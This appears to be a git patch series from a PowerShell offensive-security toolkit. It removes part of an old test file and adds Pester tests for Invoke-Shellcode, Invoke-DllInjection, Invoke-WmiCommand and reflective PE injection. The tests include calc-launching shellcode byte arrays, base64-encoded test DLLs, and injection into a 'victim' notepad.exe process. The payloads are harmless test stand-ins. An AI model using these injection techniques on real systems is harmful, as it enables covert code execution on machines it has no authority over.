AAAAAAAtCIAAMIiAADeIgAA6iIAAPwiAAAQIwAAbCUAAFwlAABCJQAALCUAABYlAAD8JAAA7CQAAIAlAAAAAAAAmiMAAK4jAAC8IwAAyCMAANQjAADeIwAAhCMAAP4jAAAwJAAAOCQAAEIkAABQJAAAXiQAAGgkAAB6JAAAiiQAAKQkAAC6JAAA1CQAAHojAAByIwAAaiMAAFgjAABIIwAAOiMAACwjAADqIwAAAAAAAIgAQ3JlYXRlRmlsZUEAHAFFeHBhbmRFbnZpcm9ubWVudFN0cmluZ3NBACUFV3JpdGVGaWxlAEUCR2V0UHJvY0FkZHJlc3MAABUCR2V0TW9kdWxlSGFuZGxlQQAAUgBDbG9zZUhhbmRsZQBLRVJORUwzMi5kbGwAAGsBX1hjcHRGaWx0ZXIAFwJfYW1zZ19leGl0AAC2AV9fZ2V0bWFpbmFyZ3MA8gFfX3NldF9hcHBfdHlwZQAATgZleGl0AACDAl9leGl0AC8CX2NleGl0AABAAl9jb25maWd0aHJlYWRsb2NhbGUA9AFfX3NldHVzZXJtYXRoZXJyAAANA19pbml0dGVybV9lAAwDX2luaXR0ZXJtALcBX19pbml0ZW52AKICX2Ztb2RlAAA/Al9jb21tb2RlAAA1AT90ZXJtaW5hdGVAQFlBWFhaAKkBX19jcnRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAE1TVkNSMTIwLmRsbAAAlANfbG9jawAEBV91bmxvY2sALgJfY2FsbG9jX2NydACuAV9fZGxsb25leGl0ADoEX29uZXhpdAAUA19pbnZva2Vfd2F0c29uAABDAl9jb250cm9sZnBfcwAAegJfZXhjZXB0X2hhbmRsZXI0X2NvbW1vbgBQAl9jcnRfZGVidWdnZXJfaG9vawAArAFfX2NydFVuaGFuZGxlZEV4Y2VwdGlvbgCrAV9fY3J0VGVybWluYXRlUHJvY2VzcwDqAEVuY29kZVBvaW50ZXIApwNRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgDBAUdldEN1cnJlbnRQcm9jZXNzSWQAxQFHZXRDdXJyZW50VGhyZWFkSWQAAHkCR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAygBEZWNvZGVQb2ludGVyAAADSXNEZWJ1Z2dlclByZXNlbnQABANJc1Byb2Nlc3NvckZlYXR1cmVQcmVzZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA/v////////9O5kC7sRm/RAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAABEAQAACjATMB0wIjAnMDAwNzBXMGQwmzCoMLMw7zD/MB4xKjEwMUIxTDFVMV8xZTFuMXQxeTF+MYMxizGQMaIxqjGwMbwxxzHQMdox4THnMewx8TH2MfsxATIJMh0yNzJXMmkycTJ2MnsynTKjMqoyrzK8Mssy0zLbMu8y9TL6MgIzCDMOMxszITMrM0ozUDNaM2AzaTNuM8sz2jPgM0Y0SzRdNHs0jzSVNEA1WzVnNXY1fzWMNbs1wzXPNeA16zXwNfU1DDYbNiE2NDZJNlQ2ajaENo42yjbPNuo27zYwNzY3QTdeN6k3rje+N8Q3yjfQN9Y33DfiN+g3+DcBOAg4GzhTOFk4XzhlOGs4cTh4OH84hjiNOJQ4mziiOKo4sji6OMY4zzjUONo45DjuOP44DjkeOSc5Njk8OUI5SDkAAAAgAAAgAAAAsDC8MMAwxDDQMNQwVDGEMYgxpDGoMcgxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
-
-	$WideStrDllBytes32 = [Convert]::FromBase64String($Encoded32BitWStringDll)
-	$StrDllBytes32 = [Convert]::FromBase64String($Encoded32BitStringDll)
-	$VoidDllBytes32 = [Convert]::FromBase64String($Encoded32BitVoidDll)
-	$WideStrDllBytes64 = [Convert]::FromBase64String($Encoded64BitWStringDll)
-	$StrDllBytes64 = [Convert]::FromBase64String($Encoded64BitStringDll)
-	$VoidDllBytes64 = [Convert]::FromBase64String($Encoded64BitVoidDll)
-	$ExeBytes32 = [Convert]::FromBase64String($Encoded32BitExe)
-	$ExeBytes64 = [Convert]::FromBase64String($Encoded64BitExe)
-
-	if ([IntPtr]::Size -eq 4) {
-		$PowerShell32bit = $True
-		$WideStrDllBytes = $WideStrDllBytes32
-		$StrDllBytes = $StrDllBytes32
-		$VoidDllBytes = $VoidDllBytes32
-		$ExeBytes = $ExeBytes32
-	} else {
-		$PowerShell32bit = $False
-		$WideStrDllBytes = $WideStrDllBytes64
-		$StrDllBytes = $StrDllBytes64
-		$VoidDllBytes = $VoidDllBytes64
-		$ExeBytes = $ExeBytes64
-	}
-
-	Context 'DLL loading' {
-		It 'should load a DLL (wchar_t*) in memory within powershell.exe and returns "Hello, world!"' {
-			$Result = Invoke-ReflectivePEInjection -PEBytes $WideStrDllBytes -FuncReturnType WString -DoNotZeroMZ
-
-			$Result | Should Not BeNullOrEmpty
-			$Result | Should Be 'Hello, world!'
-		}
-
-		It 'should load a DLL (char*) in memory within powershell.exe and returns "Hello, world!"' {
-			$Result = Invoke-ReflectivePEInjection -PEBytes $StrDllBytes -FuncReturnType String -DoNotZeroMZ
-
-			$Result | Should Not BeNullOrEmpty
-			$Result | Should Be 'Hello, world!'
-		}
-
-		It 'should load a DLL (void) in memory within powershell.exe and writes "Hello, world!" to %TEMP%\testoutput.txt' {
-			$TestOutputPath = Join-Path $Env:TEMP 'testoutput.txt'
-			if (Test-Path $TestOutputPath) { Remove-Item $TestOutputPath }
-
-			Invoke-ReflectivePEInjection -PEBytes $VoidDllBytes -FuncReturnType Void -DoNotZeroMZ
-
-			Start-Sleep -Seconds 2
-			$TestOutputPath | Should Exist
-			$Result = Get-Content $TestOutputPath
-
-			$Result | Should Not BeNullOrEmpty
-			$Result | Should Be 'Hello, world!'
-		}
-
-		It 'should load a DLL (void) in memory within notepad.exe and write "Hello, world!" to %TEMP%\testoutput.txt' {
-			$64BitOS = $False
-			if ($Env:ProgramW6432) { $64BitOS = $True }
-
-			# When launching notepad.exe, the bitness of the process needs to match that of powershell.exe
-			if ($PowerShell32bit -and $64BitOS) {
-				# 32-bit PowerShell on a 64-bit OS needs to launch Wow64 notepad
-				$NotepadPath = "$($Env:SystemRoot)\SysWow64\notepad.exe"
-			} else {
-				$NotepadPath = "$($Env:SystemRoot)\System32\notepad.exe"
-			}
-
-			$NotepadProc = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $NotepadPath
-
-			if ($NotepadProc.ReturnValue -ne 0) {
-				throw 'Could not start victim process: notepad.exe'
-			} 
-
-			$VictimPID = $NotepadProc.ProcessId
-
-			$TestOutputPath = Join-Path $Env:TEMP 'testoutput.txt'
-			if (Test-Path $TestOutputPath) { Remove-Item $TestOutputPath }
-
-			Invoke-ReflectivePEInjection -PEBytes $VoidDllBytes -ProcId $VictimPID -DoNotZeroMZ
-
-			$Result = Get-Content $TestOutputPath
-
-			Start-Sleep -Seconds 2
-
-			Stop-Process -Id $VictimPID
-
-			$Result | Should Not BeNullOrEmpty
-			$Result | Should Be 'Hello, world!'
-		}
-
-		It 'should not load a DLL in memory within powershell.exe when the bitness of powershell.exe and the DLL do not match.' {
-			if ($PowerShell32bit) {
-				$PEBytes = $WideStrDllBytes64
-			} else {
-				$PEBytes = $WideStrDllBytes32
-			}
-
-			# Attempt to load the wide string DLL in memory with a mismatched bitness
-			{ Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -DoNotZeroMZ } | Should Throw
-		}
-
-		It 'should not load a DLL in memory within powershell.exe when the return types do not match.' {
-			# This DLL exports WStringFunc which means that -FunReturnType should be WString
-			{ $Result = Invoke-ReflectivePEInjection -PEBytes $WideStrDllBytes -FuncReturnType String -DoNotZeroMZ } | Should Throw
-		}
-	}
-
-	Context 'EXE Loading' {
-		$TestOutputPath = Join-Path $Env:TEMP 'testoutput.txt'
-
-		BeforeEach {
-			if (Test-Path $TestOutputPath) { Remove-Item $TestOutputPath }
-		}
-
-		It 'should load an EXE in memory within powershell.exe and write "Hello, world!" to %TEMP%\testoutput.txt when provided no arguments' {
-			Invoke-ReflectivePEInjection -PEBytes $ExeBytes -DoNotZeroMZ
-		}
-
-		It 'should load an EXE in memory within powershell.exe and write "Hello, world!" to %TEMP%\testoutput.txt when provided arguments' {
-			Invoke-ReflectivePEInjection -PEBytes $ExeBytes -ExeArgs 'foo bar' -DoNotZeroMZ
-		}
-
-		AfterEach {
-			Start-Sleep -Seconds 2
-			$TestOutputPath | Should Exist
-			$Result = Get-Content $TestOutputPath
-
-			$Result | Should Not BeNullOrEmpty
-			$Result.StartsWith('Hello, world!') | Should Be $True
-		}
-	}
-}
\ No newline at end of file
-- 
cgit v1.2.3


From c03965c8f99c76b0ce63fb533b29a5f31dd162e4 Mon Sep 17 00:00:00 2001
From: Matt Graeber <PowerShellMafia@users.noreply.github.com>
Date: Mon, 9 Nov 2015 10:56:34 -0800
Subject: Adding Pester tests for CodeExecution module

---
 Tests/CodeExecution.tests.ps1 | 362 ++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 362 insertions(+)
 create mode 100644 Tests/CodeExecution.tests.ps1

(limited to 'Tests')

diff --git a/Tests/CodeExecution.tests.ps1 b/Tests/CodeExecution.tests.ps1
new file mode 100644
index 0000000..b8e415e
--- /dev/null
+++ b/Tests/CodeExecution.tests.ps1
@@ -0,0 +1,362 @@
+Set-StrictMode -Version Latest
+
+$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
+$ModuleRoot = Resolve-Path "$TestScriptRoot\.."
+$ModuleManifest = "$ModuleRoot\CodeExecution\CodeExecution.psd1"
+
+Remove-Module [C]odeExecution
+Import-Module $ModuleManifest -Force -ErrorAction Stop
+
+Describe 'Invoke-Shellcode' {
+	# 32-bit calc popping shellcode
+	[Byte[]] $Shellcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,
+								0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,
+								0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,
+								0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,
+								0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,
+								0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,
+								0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
+								0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,
+								0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,
+								0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,
+								0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,
+								0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,
+								0x61,0x6c,0x63,0x00)
+
+	# 64-bit calc popping shellcode
+	[Byte[]] $Shellcode64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
+								0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,
+								0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
+								0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,
+								0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,
+								0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,
+								0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,
+								0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,
+								0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,
+								0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,
+								0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,
+								0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
+								0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,
+								0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,
+								0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
+								0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,
+								0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00)
+
+	$PowerShell32bit = $False
+	$Shellcode = $Shellcode64
+
+	if ([IntPtr]::Size -eq 4) {
+		$PowerShell32bit = $True
+		$Shellcode = $Shellcode32
+	}
+
+	$64BitOS = $False
+	if ($Env:ProgramW6432) { $64BitOS = $True }
+
+	# When launching notepad.exe, the bitness of the process needs to match that of powershell.exe
+	if ($PowerShell32bit -and $64BitOS) {
+		# 32-bit PowerShell on a 64-bit OS needs to launch Wow64 notepad
+		$NotepadPath = "$($Env:SystemRoot)\SysWow64\notepad.exe"
+	} else {
+		$NotepadPath = "$($Env:SystemRoot)\System32\notepad.exe"
+	}
+
+	BeforeEach {
+		# Kill all running instances of calc.exe or Calculator.exe (i.e. "modern" calc)
+		Get-Process | Where-Object { $_.ProcessName -match '^[Cc]alc(ulator)?$' } | Stop-Process -Force
+	}
+
+	It 'should pop calc without arguments' {
+		Invoke-Shellcode -Force
+
+		Start-Sleep -Seconds 2
+	}
+
+	It 'should pop calc in host process with -Shellcode arg' {
+		Invoke-Shellcode -Shellcode $Shellcode -Force
+
+		Start-Sleep -Seconds 2
+	}
+
+	It 'should pop calc in victim notepad.exe process without -Shellcode arg' {
+		$NotepadProc = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $NotepadPath
+
+		if ($NotepadProc.ReturnValue -ne 0) {
+			throw 'Could not start victim process: notepad.exe'
+		} 
+
+		$VictimPID = $NotepadProc.ProcessId
+
+		Invoke-Shellcode -ProcessId $VictimPID -Force
+
+		Start-Sleep -Seconds 2
+
+		Stop-Process -Id $VictimPID
+	}
+
+	It 'should pop calc in victim notepad.exe process with -Shellcode arg' {
+		$NotepadProc = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $NotepadPath
+
+		if ($NotepadProc.ReturnValue -ne 0) {
+			throw 'Could not start victim process: notepad.exe'
+		}
+
+		$VictimPID = $NotepadProc.ProcessId
+
+		Invoke-Shellcode -ProcessId $VictimPID -Shellcode $Shellcode -Force
+
+		Start-Sleep -Seconds 2
+
+		Stop-Process -Id $VictimPID
+	}
+
+	AfterEach {
+		# Validate that a calc process was launched by the shellcode
+
+		$CalcProcs = Get-Process | Where-Object { $_.ProcessName -match '^[Cc]alc(ulator)?$' }
+		$CalcCount = $CalcProcs | Measure-Object
+
+		if ($CalcCount.Count -gt 0) {
+			$CalcProcs | Stop-Process -Force
+		}
+
+		$CalcCount.Count | Should BeGreaterThan 0
+	}
+}
+
+Describe 'Invoke-DllInjection' {
+	$Accessibilitycpl = 'accessibilitycpl.dll'
+	$AccessibilitycplPath = "$($Env:SystemRoot)\System32\$Accessibilitycpl"
+
+	It 'should inject a known system DLL' {
+		if (-not (Test-Path $AccessibilitycplPath)) {
+			throw "$AccessibilitycplPath does not exist on disk."
+		}
+		
+		$LoadedModule = Invoke-DllInjection -ProcessID $PID -Dll $AccessibilitycplPath
+		$LoadedModule | Should Not BeNullOrEmpty
+
+		$LoadedModule -is [System.Diagnostics.ProcessModule] | Should Be $True
+		$LoadedModule.ModuleName | Should Be $Accessibilitycpl
+	}
+
+	It 'should not inject a non-existent DLL' {
+		$NonExistentDllPath = 'C:\foo.dll'
+
+		Test-Path $NonExistentDllPath | Should Be $False
+
+		{ Invoke-DllInjection -ProcessID $PID -Dll $NonExistentDllPath } | Should Throw
+	}
+
+	It 'should not inject to a non-existent process' {
+		{ Invoke-DllInjection -ProcessID 0 -Dll $AccessibilitycplPath } | Should Throw
+	}
+}
+
+Describe 'Invoke-WmiCommand' {
+	$RegistryHive = 'HKEY_CURRENT_USER'
+	$KeyPath = 'SOFTWARE\Microsoft\Cryptography\RNG'
+	$RegistryKeyPath = "HKCU:\$KeyPath"
+	$RegistryPayloadValueName = 'Seed'
+	$RegistryResultValueName = 'Value'
+	$ComputerName = 'localhost'
+	$SamplePayload = { 1+1 }
+	$SamplePayloadResult = & $SamplePayload
+	$SamplePayloadResultType = $SamplePayloadResult.GetType()
+
+	Context 'Successful code execution' {
+		BeforeEach {
+			# Ensure registry keys and values are cleaned up prior to execution
+			Remove-ItemProperty -Path $RegistryKeyPath -Name $RegistryPayloadValueName -ErrorAction SilentlyContinue
+			Remove-ItemProperty -Path $RegistryKeyPath -Name $RegistryResultValueName -ErrorAction SilentlyContinue
+			Remove-Item -Path $RegistryKeyPath -ErrorAction SilentlyContinue
+		}
+
+		AfterEach {
+			{ Remove-ItemProperty -Path $RegistryKeyPath -Name $RegistryPayloadValueName -ErrorAction Stop } | Should Throw
+			{ Remove-ItemProperty -Path $RegistryKeyPath -Name $RegistryResultValueName -ErrorAction Stop } | Should Throw
+			{ Remove-Item -Path $RegistryKeyPath -ErrorAction Stop } | Should Throw
+		}
+
+		It 'should execute a sample payload locally and clean up properly' {
+			$Result = Invoke-WmiCommand -Payload $SamplePayload
+
+			$Result | Should Not BeNullOrEmpty
+			$Result.PayloadOutput -is $SamplePayloadResultType | Should Be $True
+			$Result.PayloadOutput | Should Be $SamplePayloadResult
+			$Result.PSComputerName | Should Be $ComputerName
+		}
+
+		It 'should execute a sample payload "remotely" (localhost) and clean up properly' {
+			$Result = Invoke-WmiCommand -Payload $SamplePayload -ComputerName $ComputerName
+
+			$Result | Should Not BeNullOrEmpty
+			$Result.PayloadOutput -is $SamplePayloadResultType | Should Be $True
+			$Result.PayloadOutput | Should Be $SamplePayloadResult
+			$Result.PSComputerName | Should Be $ComputerName
+		}
+
+		It 'should execute a sample payload with explicit arguments locally and clean up properly' {
+			$Result = Invoke-WmiCommand -Payload $SamplePayload -RegistryHive $RegistryHive -RegistryKeyPath $KeyPath -RegistryPayloadValueName $RegistryPayloadValueName -RegistryResultValueName $RegistryResultValueName
+		
+			$Result | Should Not BeNullOrEmpty
+			$Result.PayloadOutput -is $SamplePayloadResultType | Should Be $True
+			$Result.PayloadOutput | Should Be $SamplePayloadResult
+			$Result.PSComputerName | Should Be $ComputerName
+		}
+	}
+
+	Context 'Invalid arguments' {
+		It 'should not process invalid registry hives' {
+			{ Invoke-WmiCommand -Payload $SamplePayload -RegistryHive 'HKEY_FOO' -RegistryKeyPath $KeyPath -RegistryPayloadValueName $RegistryPayloadValueName -RegistryResultValueName $RegistryResultValueName } | Should Throw
+		}
+	}
+}
+
+Describe 'Invoke-ReflectivePEInjection' {
+	# A bare bones test harness DLL that simply returns L"Hello, world!" upon having WStringFunc called
+	# See https://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/
+	$Encoded64BitWStringDll = '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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAACCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
